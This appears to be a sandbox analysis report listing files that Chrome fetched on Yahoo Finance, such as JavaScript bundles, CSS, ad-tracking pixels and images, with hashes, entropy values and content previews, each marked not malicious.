                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:const __vite__fileDeps=["./EventCalendarPreview.BY3IOFS-.js","./scheduler.Dsuh-FKt.js","./index.CvwOawEI.js","./each.CI2tb2RB.js","./commonUtil.BWwawKjd.js","./stores.BCwnb1-k.js","./43.BgWy8GOF.js","./control.CYgJF_JY.js","./Button.C2rixdaC.js","./spread.CgU5AtxT.js","./Icon.C8w5V9EK.js","../assets/Icon.DgFg0-NP.css","./i13nUtil.8E8_gCdn.js","../assets/Button.D4GRMVdO.css","./calendar_today.CDOAEiKc.js","./chevron_left.CltsmSmq.js","./Link.vSNQugO0.js","../assets/Link.CHR7GGSC.css","./Select.DMUNtRO-.js","./check.21reEWCG.js","./a11y-dialog.esm.BnYZCIGX.js","./expand_more.DscV4c36.js","../assets/Select.G4QVlChI.css","./chevron_right.Cz_AJ_iF.js","./Tooltip.CzSuDxyY.js","./floating-ui.dom.C5fi-pG6.js","../assets/Tooltip.IRw8ojlh.css","./datetimeUtils.BKCxat1F.js","../assets/EventCalendarPreview.CNE2v6iu.css"],__vite__mapDeps=i=>i.map(i=>__vite__fileDeps[i]);.import{_ as A}from"./preload-helper.D6kgxu3v.js";import{c as y,d as E,s as C,h as T}from"./commonUtil.BWwawKjd.js";import{f as w,
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (3950)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):3951
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.847724332399652
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:8fS8oz8jvY+8CC7znlYLkEhoGh5kQJTYtG/EWGXG/Q+:Ioz8jvWCF7b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:471B58064CDF1ECA8C83D0D99B13D72D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:28D0F6DF93673CF206160C638D6624F818EA64D7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:8FAF3D53C8C710CA586D6EF44EC25C7B85F0D68B0030C0B7232C7063E1FE82B8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:815697001A4157EBE0AA78BDFF99DB7FB0266E4562E289E49DF7FA06E5FE87A3A5B19B8357219022D86BEF5AFE179F9B260B4F2991E7157B18300E52FBD30B4A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/assets/Tooltip.IRw8ojlh.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.tooltip.yf-7dju6j.yf-7dju6j{--tooltip-border-width:1px;--tooltip-arrow-size:10px;--tooltip-background:var(--surface1);--tooltip-border-color:var(--separator);--tooltip-max-width:240px;--tooltip-min-width:180px;--tooltip-border-radius:var(--border-radius-m);background-color:var(--tooltip-background);border-radius:var(--tooltip-border-radius);border:var(--tooltip-border-width) solid var(--tooltip-border-color);box-shadow:var(--shadow2);position:absolute;top:0;left:0;min-width:var(--tooltip-min-width);max-width:var(--tooltip-max-width);z-index:4;display:none;padding:var(--space-4)}.tooltip.displayed.yf-7dju6j.yf-7dju6j{display:block}.tooltip.yf-7dju6j .title.yf-7dju6j{font-size:var(--font-size, var(--font-l));font-weight:var(--font-bold)}.tooltip.yf-7dju6j .desc.yf-7dju6j{font-size:var(--font-size, var(--font-m));font-weight:var(--font-normal);font-family:var(--font-family)}.tooltip.marketing.yf-7dju6j.yf-7dju6j{--tooltip-background:var(--purple-100);--tooltip-border-color:transparent;co
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://beacon-ams3.rubiconproject.com/beacon/d/87e61a75-d832-454f-b787-e6ab97775e18?oo=0&accountId=17250&siteId=539018&zoneId=3323074&sizeId=57&e=6A1E40E384DA563BD4613B9AE7FB679BF053A932AC3798609B281B23720968C377F7695EF0AB8358BA87D46129D94307683D50851BF2EEDF04B68D5BB0DEF9B6670C0F35FF6AA6AB123F4BC77F95DF3763AF685AF18256F352818FE89C133E1A1671EFBD4886683A861DB2B33129E93DE1501A5C29ACF5C995BCEA9A1A431B34
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (3735), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):3735
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.835929595261791
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:M9xN8LvJKRE38YLZvdV9jqmsol0e3fCkyc:M9xN8bJKRQ88VVsoGe3fJF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:A03361886464B469ACD3A16CFBD022ED
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:85862F5A82AE0389B03270BD74EB632E0D66BE12
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:DF636670DA8B690EF359C8A48A24ABACD6E8BBD27288E38FB2F24EC922895805
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:8AA03B15DE113EE7147A72A83E34E76D7120CD005452F4726B8D61039DE23673AA7A177BB198ADBEDAC64871BA49C5EFD116B9708B84CB0F9E45AE8C48E8C339
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/aaq/fp/css/react-wafer-weather.common.desktop.a03361886464b469acd3a16cfbd022ed.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:@-webkit-keyframes spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(360deg);transform:rotate(360deg)}}@keyframes spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(360deg);transform:rotate(360deg)}}.weather-card-form:after{background:var(--white);border-bottom:1px solid var(--dirty-seagull);border-right:1px solid var(--dirty-seagull);content:"";height:8px;position:absolute;right:8px;top:-6px;-webkit-transform:rotate(225deg);transform:rotate(225deg);width:8px}#grid-layout .weather-card-form:after,#grid-layout button.wafer-geolocation-denied,#weather-widget-next-gen .weather-card-form:after,.weather-card-form.wafer-form-complete,.weather-card-form.wafer-form-inprogress{display:none}.lockerWeather-card-form .wafer-autocomplete:focus{outline:0}.wafer-autocomplete-list{list-style-type:none;padding:0;margin:0;-webkit-transition:-webkit-transform opacity .3s ease-out;transition:transform opacity .3s ease-out;trans
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (26903)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):42073
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.575196723691079
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:Aymzet0fCpTV0YzixtEXj8hu4t7oxgoPssMxBptKJbhd/uhaPzOCSa76LixzbJr/:XeC3fuolOj9Lsn8Ebu1FtEMw
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:F89454C79BF2ADE6E881584BE15D9A1F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:253DF17838C921619B6E86BD307296064073FB2E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:D23FD1400D54766C6A56A3A04BC2A02C69EA6F4E68CDF99C44A65418E5F4CC84
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:D222A9D83E450B8BBDEC181DF5FACFFA7E7E77D9AAC8DBAD77A5795FC18C7A7A3C1FC5B274D44F5809B06A478250E99C91B442F87D6724124F607E853AA6708E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as te,p as Y,k as N,i as _,x as oe,t as Q,h as q,n as X,I as de,e as I,b as L,d as H,f as A,j as V,q as T,l as S,L as G,G as at,m as $,Y as me,H as be,z as ye,K as fe,D as Ee,O as we}from"./scheduler.Dsuh-FKt.js";import{S as ne,i as le,c as K,b as M,m as z,t as p,a as C,d as D,g as J,e as Z}from"./index.CvwOawEI.js";import{e as F,u as st,o as rt}from"./each.CI2tb2RB.js";import{Q as ie,L as _e,s as ge,g as ot,o as it,b as ct,c as ft,l as ut,i as ht,d as dt,e as mt,f as _t,t as Se,a as gt,h as vt,r as pt,j as bt,k as Ce,I as yt,m as Et,C as wt}from"./chartUtil.-voOXoQ6.js";import{g as ae,t as U,ba as St,m as Ct,s as ke,a6 as kt,n as Tt,al as We,Z as It,b as Te,N as Ie}from"./commonUtil.BWwawKjd.js";import{s as Fe,b as Ht,c as Nt,d as Rt}from"./cookieUtil.CNxvneMM.js";import{I as ce}from"./Icon.C8w5V9EK.js";import{S as Xe,O as Je}from"./Select.DMUNtRO-.js";import{S as Ze}from"./settings.Cb3KIuwM.js";import{S as ve}from"./Switch.5Dhu_-MN.js";import{M as $e}from"./MenuSurface.CpHW4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (5471)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):5472
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.423607428807685
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:cmQuF96cISR9kocIkjJdMcER+krEoN62zIECM9nsJ6oaPY/QwGYPyM0NYLGpWkZP:coFs4HkldkGoxkECMuJ6CGYaM08GYkZP
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:14EE0B179713EB236F89AC3327104622
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:20A96C9A74A2A916C8E8BDB26331FA800A25201D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:2E835E760A5011AD7DC7003FB7500D08C76A95E8226198579A82C2D66EE5130C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:28ADD8531EE5DB87160D59B2A2DE866EE7B7ED6003A583ADB2086610D49A929C7588A2DBF78617B61FC1B348F24710ABB180074406097A49E3601CB8D876D128
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as W,e as M,b as H,d as z,f as E,j as J,i as g,q as h,O as N,L as w,k as D,l as L,I as X,c as Y,u as Z,g as p,a as x,a7 as q,Q as $,t as ee,h as le}from"./scheduler.Dsuh-FKt.js";import{S as te,i as oe,t as b,g as K,a as y,e as P,c as ie,b as ne,m as ae,d as se}from"./index.CvwOawEI.js";import{A as fe}from"./a11y-dialog.esm.BnYZCIGX.js";import{B as ce}from"./Button.C2rixdaC.js";import{C as ue}from"./close.C3ug6nNR.js";import{t as A}from"./commonUtil.BWwawKjd.js";const re=o=>({isDisplayed:o&2048}),j=o=>({isDisplayed:o[11]});function de(o){let e;return{c(){e=M("div"),this.h()},l(l){e=z(l,"DIV",{class:!0}),E(e).forEach(g),this.h()},h(){h(e,"class","dialog-overlay yf-1vc3z4o"),w(e,"overlay",o[7])},m(l,t){D(l,e,t)},p(l,t){t&128&&w(e,"overlay",l[7])},d(l){l&&g(e)}}}function me(o){let e;return{c(){e=M("div"),this.h()},l(l){e=z(l,"DIV",{"data-a11y-dialog-hide":!0,class:!0}),E(e).forEach(g),this.h()},h(){h(e,"data-a11y-dialog-hide",""),h(e,"class","dialog-overlay yf-1vc3z4o"),w(e,"overl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (23479), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):23479
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.181521598468942
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:rFfj/6GpZNfFQi4mvfm0N+Dzao0QMyb0+qB9M:5L/vLNQi4m3m02zMQMyb05s
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:E6A743E22F5B7027F77359F0A549572B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:3EE7D7C1F50B654AFF770E4EED916502D7D62B7B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:E6C22E612E82D6AF3F495357F5EF64A81467312A4A817F3625B15490629257EA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:6A440F8772A29CF710417746BBF0AF9994C6C609BAD6B313DAB3FFC8F73BB4947E7AF8D52D3DEEBC78B4863BC961F5501A03768C78AD2BECC490CBB0838819FB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(){var r="BrowserSubscriptionHelper",i=["chrome","chrome mobile"],p="error",f="info",n="pushNotifications",o="undefined",t="Unsupported Browser.",u="granted",a="denied",c="subscriptions",s="type",d="push",e="display-push-promos",l="js-push-subscribe",h="rapidnofollow",b="subscriptionFail",m="Permission denied by user";function g(e,n,i){this.init(e,n,i)}if(g.prototype={init:function(e,n,i){var r=this;r.beaconer=n,r.tracker=i,r.config={appServerPubKey:e.appServerPubKey,bucket:e.bucket,confirmationNotification:e.confirmationNotification||{},enableIndexedDbDurationBeacon:e.enableIndexedDbDurationBeacon||!1,enablePermissionChangeBeacon:e.enablePermissionChangeBeacon||!1,overlay:e.overlay||{},resubscribeOnChurn:e.resubscribeOnChurn||!1,serviceWorkerScope:e.serviceWorkerScope||"/",serviceWorkerUrl:e.serviceWorkerUrl,spaceId:e.spaceId,subscriptionService:e.subscriptionService||{},supportedBrowsers:e.supportedBrowsers||{},userAgent:e.userAgent||{}},r.appServerPubKeyArr=r.urlB64ToUint8A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CUnl/7yltxlHh/:/+/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:07FFF40B5DD495ACA2AC4E1C3FBC60AA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:E8AC224BA9EE97E87670ED6F3A2F0128B7AF9FE4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:A065920DF8CC4016D67C3A464BE90099C9D28FFE7C9E6EE3A18F257EFC58CBD7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:49B8DAF1F5BA868BC8C6B224C787A75025CA36513EF8633D1D8F34E48EE0B578F466FCC104A7BED553404DDC5F9FAFF3FEF5F894B31CD57F32245E550FAD656A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://sync.srv.stackadapt.com/sync?nid=20&gdpr=0&gdpr_consent=&gpp=DBAA&gpp_sid=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (58453)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):476737
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.419117959306688
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:6144:m9ivjwh+GUW1T3gv69owLgI9pNThOyk9BsHgvx+iS:OawYGUkTwv69o0z9pNTf08gvrS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:E91D3408114CBA65564923D36EE9F76D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:0ACFF91A8487CDC60BF857D7DF79A3F8A45D3891
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:6D39304995011C2F87FF95BEAAC636032F5FD9D640FDA1F8B7E74E000C21A5DF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:1CFA60AD526EC73D1A0F42D91903EC2A8F758814BC652013991813A6CBCD02A11976CCCFD818F15D2AE24BE984F5F5A14EA2E88F55915B132BD8248534529A47
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/* prebid.js v8.51.0.Updated: 2024-09-19.Build: 2.0.27.Modules: consentManagement, consentManagementGpp, consentManagementUsp, criteoBidAdapter, enrichmentFpdModule, gdprEnforcement, gppControl_usnat, gppControl_usstates, gptPreAuction, ixBidAdapter, liveIntentIdSystem, medianetBidAdapter, openxBidAdapter, prebidServerBidAdapter, priceFloors, pubmaticBidAdapter, rtdModule, rubiconBidAdapter, taboolaBidAdapter, tripleliftBidAdapter, ttdBidAdapter, userId, yahooAnalyticsAdapter, yahooPrebidServer, yahooRtdProvider, yahoosspBidAdapter, yieldmoBidAdapter, identityLinkIdSystem, pairIdSystem */.if(window.pbjs&&window.pbjs.libLoaded)try{window.pbjs.getConfig("debug")&&console.warn("Attempted to load a copy of Prebid.js that clashes with the existing 'pbjs' instance. Load aborted.")}catch(e){}else (function(){.(()=>{var r,t={5649:(r,t,e)=>{function n(r,t,e,n,o){for(t=t.split?t.split("."):t,n=0;n<t.length;n++)r=r?r[t[n]]:o;return r===o?e:r}e.d(t,{A:()=>n})},5920:r=>{./*.* @license MIT.* Fun Hoo
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1196)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1197
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.979233988205513
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:9m0w+luQdHV35MwoV30wPLPlP+x+WHhrkRWv:O+lug2ww30wPLPlPFWHhCw
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:7F67F8E7DC0C8FB74E8120723CF6C7D7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:D7E303EC802950B33B87B8E4E7E59E55C2CD1A85
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:1017EB6D060851E77B718CD90987513A5ED1CD0FFBABE5D7EC100E2AA8C19FFE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:CAF9DB123C03D19494F12B35E44A32DBB8EF3C287420A3BC910825BF802D9ABF2C4E6738CE7449DE068F61E8C63D6DB4239F00194E8A3C4F2F869F44A5493ACC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/assets/PortfolioSymbolCount.CdFvEngM.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.bold.yf-1uof5l0{font-weight:var(--font-bold)}span.yf-1p48w37{display:block;overflow:clip;white-space:nowrap;text-overflow:ellipsis}.bold.yf-1p48w37{font-weight:var(--font-bold)}.pill.yf-138ystc{background-color:var(--surface2);gap:var(--space-4);display:inline-flex;color:var(--primary);border:1px solid var(--primary);padding:.125rem var(--space-1);height:-moz-fit-content;height:fit-content;align-items:center;border-radius:var(--border-radius-s);font-size:10px;font-weight:var(--font-bold)}.icon.yf-14p0zqn{width:var(--space-6);height:var(--space-6)}.container.yf-14p0zqn{display:flex;flex-direction:row;align-items:center}.subContainer.yf-14p0zqn{display:flex;flex-direction:column;padding-left:var(--space-1);overflow:hidden;text-overflow:ellipsis}.pfName.yf-14p0zqn{font-weight:var(--font-normal);font-size:var(--font-m);overflow:hidden;text-overflow:ellipsis;margin-right:var(--space-1)}.indicator.yf-14p0zqn{font-weight:var(--font-normal);font-size:var(--font-s);overflow:hidden;text-overflo
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):8556
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.8449886669373745
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:BvMHYYWSrNQi+uwLo2Dm6lqVWmapQe4b0Ey5M+r+1aCGfldy:BvFY9+rLDm6mFnRy5M1qdy
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:EE2F93E2AA1A949F784F91434C9EBFED
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:3F254F60180978685C64CC8852EA4DD6CF8C9645
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:ACC71685EAB58867A1A5B58AF893AC4823499134D4CA9AB2DBE9A87B9A1A2DA5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:1323523F7929DEA9E4132D69E468D129CEBDB39E44CDE3B4BCE29DDBDCAB7B4E1314E4BCF09FC2641949B753A3E1ED82069A195566D3D5461CB06FB7942D0FAE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_179%2Cw_340%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A//cdn.taboola.com/libtrc/static/thumbnails/0ecf13bd0c5698f9380cda21a35784a0.jpg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:RIFFd!..WEBPVP8X....(...S.....ICCP$......$appl....mntrRGB XYZ ........... acspAPPL....APPL...........................-appl....%..M8.......................................desc.......ecprt...d...#wtpt........rXYZ........gXYZ........bXYZ........rTRC....... chad.......,bTRC....... gTRC....... desc........Display P3..................................................................................text....Copyright Apple Inc., 2017..XYZ .......Q........XYZ ..........=.....XYZ ......J....7....XYZ ......(8.......para..........ff......Y.......[sf32.......B.......&.......................nVP8 X........*T...>.>.J..").r-)0..em...2H..ZJ)....`.........O%..x....[`.O.......A......m..................}.......?.........5.....3.....a.S.......3...5Z.....6.:...x.=QF.O.W...".4:.O.5.....@.E_y..eV.iC}..r@...&.6J.;D.zW.....)...t..G/...W^_.3R3..=..G"..TN....).......M...C./Y....b...#...j....ZU..5.V.._..4.i.........>..B. ..?(...5aS.P....R..TE2:`..=..._...d.%\G..1.....4.....Lc.....i.Olv....O.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.234496061572304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:yionv//thPlE+tnM7WsrtxBllKxt8SFFFlpimp:6v/lhPfZM1U82FFlpimp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6C6641B08F4BE6F479F1588AF08054B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:8DA28B3146834C48FD843B108749191516D2A65D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:C2ECFF291918A3CAF0B7E470323E89F2A1F05B92E12A10649E598CACEBE62ACF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:BE544E3106F2B8E8083EF88B68806D6CEF2C4FBDD416C2E8EE17C88B42337A2972AF2C54CB8287A86ACCF6AC41CBCCA9A2E79F9E44417F5B144681D2B501E235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR....................sBIT....|.d.....IDAT..c````........N.....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (3178)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):3179
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.349532496541393
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:OZ4kcoCIk7ZrPjmx8ctWiJ6T2AhO6dGeAN2VRVctTiL7KSRraHNy9I3BiOtnL/:OQIkVrPSYiW26O6dJAgVELgoiI3BiOd
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:3A76B0476EC9890C130DF144192287A2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:9ACA527796516EDE2CD668736CD2182E9457BDF1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:9697C163069993BD56B2456233E9A72DB225EBCBA3D0E102EFBD41939B55C9EE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:AFA2FB4EEDF5114B177E1DC83127BD8497FCE77C385CAFE3133E849E879C37009B653C11BCD50CAD3A894B57A0B92D295A6491E19BDFC63A710644E66F49A2A1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
